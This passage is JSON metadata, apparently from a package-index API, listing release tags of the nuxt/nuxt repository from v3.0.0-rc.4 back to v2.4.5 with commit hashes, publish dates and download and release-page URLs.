5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04